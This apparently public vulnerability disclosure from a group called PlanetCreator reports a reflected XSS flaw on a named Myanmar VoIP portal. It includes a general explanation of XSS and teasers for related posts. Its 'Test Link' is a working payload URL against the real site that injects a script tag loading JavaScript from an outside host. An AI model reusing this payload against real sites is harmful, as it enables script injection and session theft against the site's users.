Yatanarpon
Yatanarpon

PlanetCreator has reported another critical XSS Vulnerability on Yatanarpon VOIP http://voip.yatanarpon.com.mm

This vulnerability has been informed to :- webmaster

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy.

XSS
XSS

Test Link

http://voip.yatanarpon.com.mm/myanmar-webportal/index.jsp?msg=<script src=http://www.planetcreator.net/attacking/xss/planetcreator-xss.js></script>

We hope that your security staff will look into this issue and fix it as soon as possible.

Explore More

What are the countermeasures against software keyloggers?

It is very hard to detect a keylogger’s activity. Hence, a Network Administrator should take the following steps as countermeasures against software keyloggers: * Actively monitor the programs running on

Read More

How does a cross site scripting (XSS) attack work?

A cross site scripting attack works in the following manner: * The attacker identifies a web site that has one or more XSS bugs for example, a web site that

Read More

Critical SQL Injection in National Library, Ministry of Culture

PlanetCreator has reported another critical SQL Injection (vulnerability) on National Library, Ministry of Culture Website http://www.nlm.gov.mm/ SQL injection is a code injection technique that exploits a security vulnerability occurring in

Read More